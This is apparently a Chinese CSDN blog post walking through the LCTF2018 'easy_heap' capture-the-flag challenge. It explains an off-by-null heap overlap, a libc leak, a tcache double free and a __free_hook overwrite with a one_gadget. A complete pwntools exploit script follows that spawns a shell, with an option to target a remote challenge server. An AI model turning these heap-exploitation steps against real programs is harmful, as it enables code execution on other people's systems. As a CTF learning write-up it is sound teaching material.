tcache-off-by-null-LCTF2018_easy_heap

已于 2022-02-09 23:55:07 修改
阅读量556 收藏
点赞数
分类专栏: pwn题目 文章标签: pwn
于 2022-02-09 23:46:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/122852018
版权

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BnITV6lq-1644421446488)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209220445863.png)

分析

ida中新建结构体:

快捷键shift+f1打开local types视图

再右击insert添加结构体:

struct ptr{
  char *p;
  unsigned int size;
};
struct ptr_array{
  ptr array[10];
};

新建后效果:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kjApNi97-1644422070511)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209235132217.png)

然后就可以在伪代码中进行类型转化了如图:选择刚才新建的结构体

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jjuOa0im-1644422070513)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209235322903.png)

效果图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KTNBmWco-1644422070514)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209235236337.png)

main:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-779rlmXj-1644421446491)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209220719973.png)

malloc:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rUznSLnp-1644421446492)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209220756664.png)

free:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gR1Ui2ZZ-1644421446493)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209220818596.png)

puts:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BaG9MJBb-1644421446494)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209220839134.png)

这题的保护措施做的很好,常见的free函数也没问题,但是这题有个off-by-null的漏洞,因为这题的限制条件较多所以考虑用堆重叠(overlapping heap chunk),然后就可以进行对重叠的chunk进行double free写入one_gadget到free_hook进行getshell

因为这题写入content时限制了\x00字符,那么在写入字节流时就会断掉写入

首先构造unsortbin进行合并的prev_size:

################################ Function ############################################
def malloc(size,data):
    sla('> ','1')
    sla('> ',str(size))
    sla('> ',data)
def free(idx):
    sla('> ','2')
    sla('> ',str(idx))
def puts(idx):
    sla('> ','3')
    sla('> ',str(idx))
def lotMalloc(s,e):
    for i in range(s,e):
        malloc(1,str(i))
def lotFree(s,e):
    for i in range(s,e):
        free(i)
#-----------------------构造unsortbins的prve_size---------------
lotMalloc(0,10) #因为存在tcache 事先准备7个以上的chunk
lotFree(3,10) #填充满tcachebins 
lotFree(0,3) #此时free将会进入到unsortbins中,并且会进行合并,合并之后会写入对应的prve_size
lotMalloc(0,7)#清空tcachebins,便于后面拿出unsortbins的chunk

结果图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ULLllLgM-1644421446494)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209221903677.png)

可以看到已经通过unlink对chunk的prev_size进行了0x200的写入,这一步是通过手动写入p64(0x200)无法完成的

然后就是通过off-by-null对堆块进行重叠,因为tcache的存在所以要填入到unsortbin中就需要先填满tcachebin,所以写法看起来有点绕,但是原理很简单

这题的off-by-null漏洞只有在首次写入content的时候使用,正常情况下堆块是由低地址到高地址申请空间的,那么这时的off-by-null漏洞就之后被后面新堆块覆盖,那么就需要构造一个堆空间结构

经过上面的写入prevsize后此时的堆空间结构如图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-o4GJbHGa-1644421446496)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209223110921.png)

那么此时想要将chunk8进行堆重叠,那么理想情况下是chunk7(unsortbin)是free状态,chunk8是使用状态,chunk9(unsortbin)是free状态,然后即可根据chunk9的prevsize进行向上合并chunk,从而造成堆重叠,示意图如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AHptCs0J-1644421446496)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209223740268.png)

根据上面就可以使用off-by-null填入到chunk8然后溢出null字节到chunk9从而改变chunk9的P标志位,伪造chunk8为free状态从而正常进行unlink,在此之前可以事先将chunk7放入到unsortbins中,根据tcache的特性会首先在tcachebins中去寻找适合大小的chunk,那么就可以将chunk8放入到tcachebins链表中的首个(先进后出)这样就可以控制malloc分配到的想要的free chunk了

#-----------------------overlapping heap chunk---------------
lotMalloc(7,10) #从unsortbins拿回chunk7,8,9
free(8)  #将chunk8放入到tcachebins 
lotFree(0,6) #填满tcachebins
free(7) #chunk7放入unsortbins
lotMalloc(0,6)
malloc(0xf8,'7') #这里拿到的是原chunk8位置的chunk,但是它在程序中的索引是7所以我命名为7然后写入0xf8的size,那么造成了off-by-null

运行结果截图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eQHQbTxq-1644421446497)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209225639186.png)

那么现在只需要free chunk9即可进行unlink了,从而造成堆重叠

lotFree(0,7) #tcachebins
free(9) #unlink

运行结果图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Nd1YQ86e-1644421446498)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209230039327.png)

堆重叠后,因为此时chunk8合并到了chunk7,在从chunk7(unsortbins)中进行分割,使libc偏移地址写入到重叠的堆块中通过puts函数即可获得libc地址:

lotMalloc(0,7) #便于拿到unsortbins的chunk
malloc(1,'8')
puts(7)
libc_base = info(rc(6))-(0x7f010cc66ca0-0x7f010c87b000)
pa('leak libc')

同样利用堆重叠进行tcache的double free

malloc(1,'9') #拿到重叠堆块

此时用与保存子堆块的chunk如图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wIcj3j0L-1644421446499)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209231416677.png)

可以看到索引为7和9的堆块都是指向同一块内存,那么就可以进行double free了

free(7)  
free(9)    #double free

因为2.27的libc没有对tcache的double free进行检查所以可以直接改变fd值从而写入目标地址

malloc(8,p64(libc_base + libc.symbols['__free_hook']))

此时用与保存子堆块的chunk如图:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rHrIlOUl-1644421446500)(tcache-off-by-null(LCTF2018_easy_heap)].assets/image-20220209231718451.png)

因为程序只允许存在10个堆块,要拿到__free_hook的chunk就需要再malloc2次,很显然程序现在只能新增一个堆块了,那么重新分配chunk,将多余的一个chunk释放到unsortbins中去即可,最后拿到_free_hook再getshell

lotFree(0,7)
lotMalloc(0,7)
malloc(8,p64(libc_base + one[1]))
free(0)

这题运用了tcachebins和unsortbins的优先分配原则从而达到控制malloc得到free chunk的顺序

注意!exp在libc2.28不行对unlink新增了对prevsize和合并的chunk size是否一致的检查

完整exp:

from pwn import *
#import sys

context.terminal = ['terminator', '-x', 'sh', '-c']
context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./easy_heap"

#one = [0x45206,0x4525a,0xcc673,0xcc748,0xefa00,0xf0897,0xf5e40,0xef9f4] #2.23(64)
#one = [0x3ac3c,0x3ac3e,0x3ac42,0x3ac49,0x3ac6c,0x3ac6d,0x5faa5,0x5faa6] #2.23(32)
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a38c,0x10a398] #2.27(64)
#idx = int(sys.argv[1])

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("111.200.241.244","58782")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

################################ Condfig ############################################
sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
it = lambda :p.interactive()

def z(s='b main'):
    gdb.attach(p,s)

def logs(addr,string='logs'):
    if(isinstance(addr,int)):
       print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,addr))
    else:
       print('\033[1;31;40m%20s-->%s\033[0m'%(string,addr))

def pa(s='1'):
    log.success('pause : step---> '+str(s))
    pause()

def info(data,key='info',bit=64):
    if(bit == 64):
      leak = u64(data.ljust(8, b'\0'))
    else:
      leak = u32(data.ljust(4, b'\0'))
    logs(leak,key)
    return leak

################################ Function ############################################
def malloc(size,data):
    sla('> ','1')
    sla('> ',str(size))
    sla('> ',data)
def free(idx):
    sla('> ','2')
    sla('> ',str(idx))
def puts(idx):
    sla('> ','3')
    sla('> ',str(idx))
def lotMalloc(s,e):
    for i in range(s,e):
        malloc(1,str(i))
def lotFree(s,e):
    for i in range(s,e):
        free(i)
################################### Statr ############################################
#-----------------------构造unsortbins的prve_size---------------
lotMalloc(0,10) #因为存在tcache 事先准备7个以上的chunk
lotFree(3,10) #填充满tcachebins 
lotFree(0,3) #此时free将会进入到unsortbins中,并且会进行合并,合并之后会写入对应的prve_size
lotMalloc(0,7)#清空tcachebins,便于后面拿出unsortbins的chunk
#-----------------------overlapping heap chunk---------------
lotMalloc(7,10) #从unsortbins拿回chunk7,8,9
free(8)  #将chunk8放入到tcachebins 
lotFree(0,6) #填满tcachebins
free(7) #chunk7放入unsortbins
lotMalloc(0,6)
malloc(0xf8,'7') #这里拿到的是原chunk8位置的chunk,但是它在程序中的索引是7所以我命名为7然后写入0xf8的size,那么造成了off-by-null
#pa('off-by-null')

lotFree(0,7) #tcachebins
free(9) #unlink
#pa('unlink')

lotMalloc(0,7) #便于拿到unsortbins的chunk
malloc(1,'8')
puts(7)
libc_base = info(rc(6))-(0x7f010cc66ca0-0x7f010c87b000)
#pa('leak libc')

malloc(1,'9') #拿到重叠堆块
free(7)   #double free
free(9)   #
#pa('double free')

malloc(8,p64(libc_base + libc.symbols['__free_hook']))
lotFree(0,7)
lotMalloc(0,7)
malloc(8,p64(libc_base + one[1]))
free(0)
################################### End ##############################################
p.interactive()
HNHuangJingYu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
学习打卡2:off-by-null
一点涵的博客
09-08 811
督促自己:2020-9-8 学习笔记: 《逆向工程权威指南上》12: 指令集架构:x86指令集架构(ISA),opcode长度不同;ARM指令集架构(精简指令集RISC),opcode相同,机器码都封装在4个字节里面(ARM模式),或封装在2个字节里面(Thumb模式) x/86: 函数返回值在eax中 使用“栈”结构存储上述返回地址 ARM: 使用LR寄存器存储函数结束的返回地址 BX LR 指令的作用就是跳转到返回地址 MIPS: 寄存器命名方式有两种:数字命名($0 ~ 31)和伪名称命名(
HITCON_2018_children_tcache关于off by null
wuyvle的博客
04-05 1118
创建Chunk时,使用了strcpy函数,而这个函数会在将字符串转移后在末尾添加一个x00,因此此处存在一个off-by-null漏洞。 思路 off by null 想到重叠(overlapping),和 16 区别主要是申请的 unsorted bin 大小需要大于 0x408 来避免 chunk 放入 tcache 。 溢出修改 inuse 位比较简单,申请使用下一个 chunk prev_size 的直接写满就行,就是 prev_size 怎么写需要想一下办法。因为 free chunk 之前.
【八芒星计划】 OFF BY NULL
carol2358的博客
08-31 928
八芒星计划是我为了加深自己对于pwn各种题型的理解发起的,我会将平时遇到的题型相似的题目放在同一篇文章里,方便自己和他人查阅,同时也可能会录制相关的视频,来加深自己的映像,并且把知识点更细致地讲述给大家。 这一篇全部记录off by null 文章目录2019-BALSN-CTF-plaintext 2019-BALSN-CTF-plaintext 【2.29的off by null,借助large bin的会留下指向自己的指针的特性,来伪造fake chunk,达成off by null】 本题进行
off by null 小结
qq_43409582的博客
11-20 3260
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
LCTF 2018 pwn easy_heap
hanabi_sh
11-04 717
LCTF 2018 pwn easy_heap,off-by-one,null-byte-overflow
TCache-开源
04-25
TCache是​​高性能键/值存储组件。 它可以轻松地插入到任何现有的高性能,分布式内存对象缓存系统(例如MemcacheD或Dynamo)中,从而通过减少数据库负载来加速动态Web应用程序
heap-viewer:一个IDA Pro插件,用于检查glibc,专注于漏洞利用开发
04-13
查看器 一个IDA Pro插件,...Tcache信息(glibc> = 2.26) GraphView的链表(bins / tcache) 结构视图(malloc_state / malloc_par / tcache_perthread) 魔术工具: 取消链接合并信息释放/合并信息假Fastbin查找器
heap_exploit_2.31
03-21
攻击2.31 glibc 2.31版中有关ptmalloc的利用。...其他利用技术与how2heap相同,因此我不编写其他代码-.- pwngdb pwngdb是用于利用的出色gdb脚本,但是在glibc 2.31中,tcache结构发生了
CVE-2021-3156:Sudo男爵Samedit漏洞
03-25
使用tcache在glibc上利用 exploit_nss.py自动检测/etc/nsswitch.conf中的所有要求和条目数 exploit_nss_manual.py exploit_nss.py的简化版本,可以更好地利用漏洞 exploit_timestamp_race.c覆盖def_timestamp和竞争...
一个用于学习各种利用技术的存储库。-C/C++开发
05-26
教育性开发该仓库用于学习各种开发技术。 我们在一次hack会议上提出了这个想法,并实现...calc_tcache_idx.c演示glibc的tcache索引计算。 fastbin_dup.c通过滥用fastbin空闲列表,诱使malloc返回已经分配的指针。
LCTF_2018_Platform:LCTF 2018平台
05-04
LCTF 2018 platform LCTF 2018 比赛平台。 本项目中前端代码为webpack打包后的前端代码,前端源码参见。 部署 项目使用nginx+uwsgi+django部署,示例的和都已上传。 uwsgi配置文件中为控制权限使用nginx:nginx用户启动,请按需修改(大部分系统nginx用户为www-data:www-data)。然后把web目录owner修改为uwsgi的启动用户: chown -R nginx:nginx . 开发版本为python 2.7,未测试过其他版本的兼容性。 食用方法 默认后台路径 api/admin/ 可在app/backend/lctf2018_backend/urls.py中修改。 默认后台管理账号密码 admin admin123456 使用时千万别忘了 cd app/backend python manage.py change
LCTF2018 PWN easy_heap 远程环境搭建
哒君的博客
08-08 797
一直很头疼环境的问题,需要目标环境的glibc版本是2.27,而我的是2.23 如果开启第二个虚拟机占用内存太大,所以我选择用docker 于是终于找到了能在libc2.27下工作的gdb插件pwngdb(注意不是那个pwndbg) 所以这个镜像可以作为Tcache机制题目的本地测试容器 GitHub docker镜像:链接:https://pan.baidu.com/s/1eCIbJl3Ig9...
[off by null + tcache dup]lctf_easy_heap
huzai9527的博客
05-17 236
[off by null + tcache dup]lctf_easy_heap 1.ida 分析 malloc函数中输入content存在off by null 2.思路 通过off by null,造成chunk overlapping,泄漏Libc的地址 这里存在off by null 通过unstored bin就可以泄漏,但由于tcache的存在,需要注意 先申请10个chunk,释放3-9,填满tcache bin之后,再释放0,1,2编号的chunk进入unstored bin
LCTF2018 PWN easy_heap学习(以及tcache基础认识)
a2590035252的博客
09-24 399
适合于广大像我一样的pwn爱好者
glibc2.29+的off by null利用
l512689096的博客
10-21 1853
本文首发自跳跳糖(http://tttang.com/archive/1614/)本文介绍了off by null的爆破法和直接法两类做法,并基于已有的高版本off by null的利用技巧做了一点改进,提出一种无特殊限制条件的直接法,更具有普适性。
(补题)LCTF2018 PWN easy_heap超详细讲解
hollk’s blog
02-08 2263
这道题是wiki上tcache attack 的Challenge 1,题目需要自己找一下。尝试上传到CSDN上,但总是提示已有,不知道是什么情况。这道题总的来说比较复杂,涉及到的知识点有:tcache分配、unsorted bin分配、块合并分割、tcache检查、hook。吐槽一点,块的id为什么非得从0开始啊!啊!啊!啊!总的来说收获满满,对tcache这类的题目理解更加深刻了(*^▽^*)
高版本libc下的off by null
weixin_45209963的博客
09-08 1747
新版额外检查这个chunk size与被free掉的chunk的prev size是否相等,chunk overlap必须要伪造后者,而前者不可控,故一般打法失效。,通过大循环将这三个chunk全部放入同一个large bins。此时由于large bins机制,中间大小的chunk的。均相同,分别指向比自己小/大的chunk,将该chunk取下,同时伪造好。),残留指针为头节点libc指针,此时需要申请到该chunk,再申请一个。的size,再将该chunk的bk取下并写其fd为该chunk(伪造。
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2036
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
Pwn】NCTF2019 easy_heap
Nothing
11-29 555
查看程序保护。 分析程序,漏洞在free之后指针没置0,导致uaf;的分配大小做了限制0x50该变量在bss段上,刚好bss段上存放了用户名信息,所以先考虑在bss上伪造块,进行一次fastbinattack,分配到bss段,修改限制大小,去掉限制之后就是常规操作了,unsortbin泄露libc,再进行一次fastbinattack,getshell。 from pwn import * ...
linux下gdb最终显示tcache_get错误,会是什么原因?
最新发布
07-13
当使用GDB调试程序时,如果最终显示 "tcache_get" 错误,可能是由于以下原因之一: 1. 未正确安装或配置glibc:GDB 是基于 glibc 的调试工具,如果 glibc 未正确安装或配置,可能会导致 tcache_get 错误。请确保...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值